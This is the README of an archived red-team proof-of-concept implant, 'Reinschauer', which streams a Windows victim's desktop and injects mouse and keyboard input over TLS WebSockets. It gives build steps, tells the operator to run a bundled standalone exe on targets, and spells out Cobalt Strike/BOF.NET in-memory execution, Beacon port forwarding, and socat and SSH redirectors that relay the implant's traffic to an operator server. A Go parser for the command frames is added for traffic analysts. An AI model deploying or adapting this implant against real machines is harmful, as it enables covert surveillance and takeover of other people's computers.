• This repository has been archived on 31/Aug/2024

Reinschauer

A PoC to remotely control Windows machines over Websockets. Check out my blog for a writeup.

  • Can be executed as Go exe, .NET/C# exe and in-memory using BOF.NET and Cobaltstrike.

  • Traffic can be tunneled via an interactive Beacon connection.
  • Unlike most HVNC implementations, reinschauer converts raw bitmaps to JPEG and compresses the resulting data before sending it across the network to reduce frame size.
  • FPS and quality settings can be dynamically changed via the GUI. These affect the implant, so that network traffic is reduced. Dynamic scaling allows using this tool as an implant for machines with large screens.

  • Basic mouse and keyboard controls are possible.
  • You can use the script in the server folder to generate TLS server files or bring your own.
  • The server window can be resized freely, while click events should™ be translated to the correct pixel on the target machine.
  • Use reinschauer-server -h for available options.

Protocol

+----------------------------------------------------------------------------------------+
|                                                                                        |
|                                                                                        |
|                  +----------------------------------------------------+                |
|                  |#1: Type (Binary or Text)                           |                |
|                  |    Binary: JPG Frame                               |                |
|                  |                                                    |                |
|                  |#2: Text                                            |                |
|                  |    ELO (Ping)                                      |                |
|                  |    FPS <FPS Count>                                 |                |
|                  |    SCL <Scaler Count>                              |                |
|                  |    QUL <JPG Quality>                               |                |
|                  |    LCL X Y (Left Click + Coordinates)              |                |
|                  |    RCL X Y                                         |                |
|                  |    KEY <Char>                                      |      xxxxxx    |
|       xxxxx   <--+----------------------------------------------------+--> xxxx   xx   |
|       x   xx                     Websockets via TLS                        xx       x  |
| x     xxxxxx                                                                xxxxxxxxx  |
| xxx     x   xx                                                          xx    x        |
|     xxxxxxxx                                                              xxxxx xxxxxx |
|         x                                                                   xxxxx      |
|         xx                                                                   xx        |
|         x xx                                                                 xxx       |
|        xx  xx                                                                x xx      |
|        x    xx                                                              xx  xxx    |
|       x      xx                                                             x     xx   |
|       x       x                                                            xx      x   |
+----------------------------------------------------------------------------------------+
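
For analysts reviewing decrypted WebSocket text frames (for example from a TLS-inspecting proxy), the following added example, which is not code from this repository, checks whether a frame matches the command list in the diagram above. It assumes space-separated fields and non-negative decimal integers, which the diagram does not specify; Command, arity and ParseFrame are hypothetical names.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Command is one parsed text frame from the command list in the diagram.
type Command struct {
	Verb string
	Args []int  // FPS, SCL, QUL take one integer; LCL and RCL take X and Y
	Key  string // payload of KEY
}

// arity: integer arguments per verb; -1 marks KEY, which carries a character.
var arity = map[string]int{"ELO": 0, "FPS": 1, "SCL": 1, "QUL": 1, "LCL": 2, "RCL": 2, "KEY": -1}

// ParseFrame validates one frame. Assumed, not stated by the diagram: space-separated fields, non-negative integers.
func ParseFrame(text string) (Command, error) {
	verb, rest, _ := strings.Cut(text, " ")
	n, known := arity[verb]
	if !known {
		return Command{}, fmt.Errorf("unknown verb %q", verb)
	}
	if n < 0 && rest != "" {
		return Command{Verb: verb, Key: rest}, nil
	}
	fields := strings.Fields(rest)
	if len(fields) != n { // also rejects KEY with no payload (n is -1)
		return Command{}, fmt.Errorf("%s: malformed arguments %q", verb, rest)
	}
	args := make([]int, n)
	for i, f := range fields {
		v, err := strconv.Atoi(f)
		if err != nil || v < 0 {
			return Command{}, fmt.Errorf("%s: bad argument %q", verb, f)
		}
		args[i] = v
	}
	return Command{Verb: verb, Args: args}, nil
}

func main() {
	// Constructed sample frames, not captured traffic.
	for _, f := range []string{"ELO", "LCL 120 340", "FPS abc", "GET /"} {
		c, err := ParseFrame(f)
		fmt.Printf("%-14q %+v err=%v\n", f, c, err)
	}
}
```

A session whose text frames consistently parse as these verbs, interleaved with binary JPEG frames, matches the traffic shape the diagram describes.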

FAQ

How to build?

  • Install a recent version of Go (>= 1.18).
  • For debian-based distros: sudo apt -y install libx11-dev libxcursor-dev xorg-dev libgl1-mesa-dev
$ cd client && GOOS=windows GOARCH=amd64 go build
$ cd server && GOOS=linux GOARCH=amd64 go build

I've included a pre-built, standalone version of the dotnet variant in this repo. If you want to build it yourself, use the Visual Studio project file to build the x64 Release variant. If it doesn't happen automatically, download the required NuGet packages for the project via Visual Studio. The target system most likely doesn't have these packages installed either, so DLLs may be missing when the resulting exe is executed there. To get around this, the project automatically invokes ILMerge.exe to bundle the resulting exe with the required libraries. Therefore, use the generated file called reinschauer-dotnet-standalone.exe on targets.

You may have to run go get for the dependencies first. Use -ldflags -H=windowsgui to disable the console window.

Who's the client/server?

The client is executed on the target (Windows) machine. The server component is executed on the tester's (Linux) machine. It listens on 0.0.0.0:6969 by default. Both the Golang and C# client are compatible with the server.

Is this a HVNC / Hidden Desktop?

No. It uses the same Desktop as the user.

Some keys and key combinations do not work, pls fix

I know that |, @ and § might not work currently, at least on my German potato keyboard. Pls Fix.

The Client uses too much CPU Time

Using a lower FPS value may work.

I don't have a direct connection between client and server

You can use a CobaltStrike Beacon to tunnel traffic.

I don't have Cobaltstrike!

Use a socat redirector like:

socat TCP4-LISTEN:1337,fork TCP4:127.0.0.1:6969
ssh -R 6969:localhost:6969 <IP>

and start the client with the required parameters or hardcode them.

Notes Regarding BOF.NET and Cobaltstrike Usage

First, set up BOF.NET according to the manual. Also, load the standalone exe with bofnet_load <Path to Exe>. Then, decide how to use Reinschauer:

  1. You can tunnel the traffic across an active Beacon connection.
  2. You can send traffic to any other Internet-facing server.

Tunnelling Traffic via Beacon

  • Set the session to interactive: sleep 0.
  • Set up remote port forwarding: rportfwd_local 6969 127.0.0.1 6969.
  • Execute Reinschauer in background: bofnet_job reinschauer_dotnet.BofStuff. This automatically causes Reinschauer to connect to 127.0.0.1:6969 on the target machine. It also deactivates TLS, since the traffic travels through the Beacon connection anyway.
  • To kill Reinschauer, use bofnet_jobkill <Job ID>.

Sending Traffic to Another Server

  • Execute Reinschauer in background: bofnet_job reinschauer_dotnet.BofStuff <Server IP> <Server Port> true. The boolean parameter enables TLS usage.
  • To kill Reinschauer, use bofnet_jobkill <Job ID>.

Then, use SSH and the GatewayPorts feature: add GatewayPorts clientspecified to sshd_config and restart the SSH server. Then, ssh -R '0.0.0.0:8080:localhost:6969' [...] will make your local port 6969 available on 0.0.0.0:8080, that is, on every interface of the SSH server. Be careful :)

Or, set up a socat redirector on the Server:

socat TCP4-LISTEN:<Server Port>,fork TCP4:127.0.0.1:6969
ssh -R 6969:localhost:6969 <IP>
